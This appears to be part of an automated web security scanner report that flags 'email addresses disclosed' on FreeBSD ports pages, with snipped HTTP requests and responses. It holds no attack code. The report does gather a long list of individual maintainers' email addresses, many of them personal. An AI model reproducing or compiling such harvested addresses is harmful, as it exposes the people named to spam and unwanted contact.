x11@FreeBSD.org

Request

GET /ports/x11-fonts.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1568217321"
Last-Modified: Sun, 23 Jan 2011 02:29:34 GMT
Content-Length: 262915
Connection: close
Date: Mon, 24 Jan 2011 16:16:47 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: X11-fonts</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="te
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:herbert.skuhra@gmx.at">herbert.skuhra@gmx.at</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:herbert.skuhra@gmx.at">herbert.skuhra@gmx.at</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sarumaru@jp.FreeBSD.org">sarumaru@jp.FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:saper@saper.info">saper@saper.info</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:maho@FreeBSD.org">maho@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:sunpoet@FreeBSD.org">sunpoet@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:duchateau.olivier@gmail.com">duchateau.olivier@gmail.com</A>
...[SNIP]...
<A HREF="mailto:jsa@FreeBSD.org">jsa@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sunpoet@FreeBSD.org">sunpoet@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:g.veniamin@googlemail.com">g.veniamin@googlemail.com</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:g.veniamin@googlemail.com">g.veniamin@googlemail.com</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nareshov@gmail.com">nareshov@gmail.com</A>
...[SNIP]...
<A HREF="mailto:prudhvi-krishna-bsd@surapaneni.in">prudhvi-krishna-bsd@surapaneni.in</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:m.seaman@infracaninophile.co.uk">m.seaman@infracaninophile.co.uk</A>
...[SNIP]...
<A HREF="mailto:m.seaman@infracaninophile.co.uk">m.seaman@infracaninophile.co.uk</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bsdports@gmail.com">bsdports@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bsdports@gmail.com">bsdports@gmail.com</A>
...[SNIP]...
<A HREF="mailto:doceng@FreeBSD.org">doceng@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jacula@FreeBSD.org">jacula@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lgfbsd@be-well.ilk.org">lgfbsd@be-well.ilk.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:koma2@lovepeers.org">koma2@lovepeers.org</A>
...[SNIP]...
<A HREF="mailto:toshi@tea.forus.or.jp">toshi@tea.forus.or.jp</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ginga-freebsd@ginganet.org">ginga-freebsd@ginganet.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sanpei@FreeBSD.org">sanpei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sanpei@FreeBSD.org">sanpei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sanpei@FreeBSD.org">sanpei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nikola.lecic@anthesphoria.net">nikola.lecic@anthesphoria.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bkoenig@alpha-tierchen.de">bkoenig@alpha-tierchen.de</A>
...[SNIP]...
<A HREF="mailto:h.eichmann@gmx.de">h.eichmann@gmx.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:koma2@lovepeers.org">koma2@lovepeers.org</A>
...[SNIP]...
<A HREF="mailto:koma2@lovepeers.org">koma2@lovepeers.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:koma2@lovepeers.org">koma2@lovepeers.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dominic.marks@btinternet.com">dominic.marks@btinternet.com</A>
...[SNIP]...
<A HREF="mailto:manuel.giraud@gmail.com">manuel.giraud@gmail.com</A>
...[SNIP]...
<A HREF="mailto:llwang@infor.org">llwang@infor.org</A>
...[SNIP]...
<A HREF="mailto:kubito@gmail.com">kubito@gmail.com</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wxs@FreeBSD.org">wxs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vlad@vlad.uz.ua">vlad@vlad.uz.ua</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obscure9@gmail.com">obscure9@gmail.com</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kkonstan@duth.gr">kkonstan@duth.gr</A>
...[SNIP]...
<A HREF="mailto:intron@intron.ac">intron@intron.ac</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gugod@gugod.org">gugod@gugod.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...

24.320. http://www.freebsd.org/ports/x11-toolkits.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/x11-toolkits.html

Issue detail

The following email addresses were disclosed in the response:

acm@FreeBSD.org
alepulver@FreeBSD.org
amdmi3@FreeBSD.org
araujo@FreeBSD.org
ashish@FreeBSD.org
bland@FreeBSD.org
bsam@FreeBSD.org
bsd-sharp@googlegroups.com
cm@therek.net
cristianorolim@hotmail.com
cyberbotx@cyberbotx.com
daichi@FreeBSD.org
danfe@FreeBSD.org
devel@stasyan.com
dhn@FreeBSD.org
dinoex@FreeBSD.org
dmitry@karasik.eu.org
doconnor@gsoft.com.au
edwin@mavetju.org
emulation@FreeBSD.org
erik@bz.bzflag.bz
fjoe@FreeBSD.org
fmysh@iijmio-mail.jp
freebsd-emulation@FreeBSD.org
gahr@FreeBSD.org
gnome@FreeBSD.org
haskell@FreeBSD.org
jacob.frelinger@duke.edu
jochen@daten-chaos.de
kde@FreeBSD.org
kevlo@FreeBSD.org
kwm@FreeBSD.org
lercordeiro@gmail.com
lx@FreeBSD.org
lx@redundancy.redundancy.org
m.sund@arcor.de
makc@FreeBSD.org
mi@aldan.algebra.com
minter@lunenburg.org
mm@FreeBSD.org
mono@FreeBSD.org
multimedia@FreeBSD.org
mwm@mired.org
neal@nelson.name
nivit@FreeBSD.org
oliver@FreeBSD.org
pauls@utdallas.edu
pav@FreeBSD.org
perl@FreeBSD.org
ports@FreeBSD.ORG
ports@FreeBSD.org
ports@c0decafe.net
ports@freebsd.org
python@FreeBSD.org
rnoland@FreeBSD.org
ruby@FreeBSD.org
sem@FreeBSD.org
shuvaev@physik.uni-wuerzburg.de
stas@FreeBSD.org
swills@FreeBSD.org
sylvio@FreeBSD.org
tmseck@web.de
tobez@FreeBSD.org
utisoft@gmail.com
vvelox@vvelox.net
wenheping@gmail.com
x11@FreeBSD.org
yokota@res.otaru-uc.ac.jp

Request

GET /ports/x11-toolkits.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2766566488"
Last-Modified: Sun, 23 Jan 2011 02:29:34 GMT
Content-Length: 1420357
Connection: close
Date: Mon, 24 Jan 2011 16:16:31 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: X11-toolkits</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT=
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:cristianorolim@hotmail.com">cristianorolim@hotmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:minter@lunenburg.org">minter@lunenburg.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sem@FreeBSD.org">sem@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tmseck@web.de">tmseck@web.de</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lx@redundancy.redundancy.org">lx@redundancy.redundancy.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:multimedia@FreeBSD.org">multimedia@FreeBSD.org</A>
...[SNIP]...
